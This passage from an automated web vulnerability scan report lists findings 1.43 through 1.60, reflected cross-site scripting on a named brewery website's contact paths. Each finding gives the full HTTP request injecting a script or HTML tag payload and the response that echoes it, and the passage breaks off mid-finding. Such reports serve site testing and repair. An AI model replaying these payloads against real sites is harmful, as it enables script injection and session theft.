Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980af"><script>alert(1)</script>56ae7003a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/basic.css?980af"><script>alert(1)</script>56ae7003a68=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/basic.css?980af"><script>alert(1)</script>56ae7003a68=1" method="post">
...[SNIP]...

1.43. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58806"><a>7369f1313b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact58806"><a>7369f1313b0/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contact58806"><a>7369f1313b0_page" class="contact58806">
...[SNIP]...

1.44. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c274"><script>alert(1)</script>f1c489d6303 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content2c274"><script>alert(1)</script>f1c489d6303/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content2c274"><script>alert(1)</script>f1c489d6303/css/ninkasi.css" method="post">
...[SNIP]...

1.45. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f7e"><script>alert(1)</script>9aa410def61 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css82f7e"><script>alert(1)</script>9aa410def61/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css82f7e"><script>alert(1)</script>9aa410def61/ninkasi.css" method="post">
...[SNIP]...

1.46. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cd3d"><script>alert(1)</script>7317fbbfebc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/ninkasi.css6cd3d"><script>alert(1)</script>7317fbbfebc HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/ninkasi.css6cd3d"><script>alert(1)</script>7317fbbfebc" method="post">
...[SNIP]...

1.47. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/ninkasi.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75689"><script>alert(1)</script>73fec1f51e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/ninkasi.css?75689"><script>alert(1)</script>73fec1f51e1=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/ninkasi.css?75689"><script>alert(1)</script>73fec1f51e1=1" method="post">
...[SNIP]...

1.48. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c04d"><a>af08b404133 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact3c04d"><a>af08b404133/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contact3c04d"><a>af08b404133_page" class="contact3c04d">
...[SNIP]...

1.49. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491d9"><script>alert(1)</script>1368f5426b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content491d9"><script>alert(1)</script>1368f5426b7/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content491d9"><script>alert(1)</script>1368f5426b7/css/print.css" method="post">
...[SNIP]...

1.50. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3975"><script>alert(1)</script>25a1ae6dfbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/cssa3975"><script>alert(1)</script>25a1ae6dfbb/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/cssa3975"><script>alert(1)</script>25a1ae6dfbb/print.css" method="post">
...[SNIP]...

1.51. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/print.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aad60"><script>alert(1)</script>24a7647a021 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/print.cssaad60"><script>alert(1)</script>24a7647a021 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/print.cssaad60"><script>alert(1)</script>24a7647a021" method="post">
...[SNIP]...

1.52. http://www.ninkasibrewing.com/contact/content/css/print.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/print.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 930c6"><script>alert(1)</script>3fba331014d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/print.css?930c6"><script>alert(1)</script>3fba331014d=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/print.css?930c6"><script>alert(1)</script>3fba331014d=1" method="post">
...[SNIP]...

1.53. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3dd3"><a>cd8ecc31aad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contacta3dd3"><a>cd8ecc31aad/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contacta3dd3"><a>cd8ecc31aad_page" class="contacta3dd3">
...[SNIP]...

1.54. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/basic.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1adf7"><script>alert(1)</script>54796ec5c3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content1adf7"><script>alert(1)</script>54796ec5c3d/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content1adf7"><script>alert(1)</script>54796ec5c3d/js/basic.js" method="post">
...[SNIP]...

1.55. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/basic.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9463"><script>alert(1)</script>0cdb8fc9cbc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/jsb9463"><script>alert(1)</script>0cdb8fc9cbc/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/jsb9463"><script>alert(1)</script>0cdb8fc9cbc/basic.js" method="post">
...[SNIP]...

1.56. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/basic.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b208"><script>alert(1)</script>e00028e101d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/basic.js9b208"><script>alert(1)</script>e00028e101d HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/basic.js9b208"><script>alert(1)</script>e00028e101d" method="post">
...[SNIP]...

1.57. http://www.ninkasibrewing.com/contact/content/js/basic.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/basic.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 407cb"><script>alert(1)</script>31b20d5279f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/basic.js?407cb"><script>alert(1)</script>31b20d5279f=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/basic.js?407cb"><script>alert(1)</script>31b20d5279f=1" method="post">
...[SNIP]...

1.58. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17c1c"><a>a8cde8ac9b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact17c1c"><a>a8cde8ac9b3/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contact17c1c"><a>a8cde8ac9b3_page" class="contact17c1c">
...[SNIP]...

1.59. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb4b5"><script>alert(1)</script>1a875df3c26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/contentcb4b5"><script>alert(1)</script>1a875df3c26/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/contentcb4b5"><script>alert(1)</script>1a875df3c26/js/combined.css" method="post">
...[SNIP]...

1.60. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3d1"><script>alert(1)</script>ecfeb04c9eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/jsbc3d1"><script>alert(1)</script>ecfeb04c9eb/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
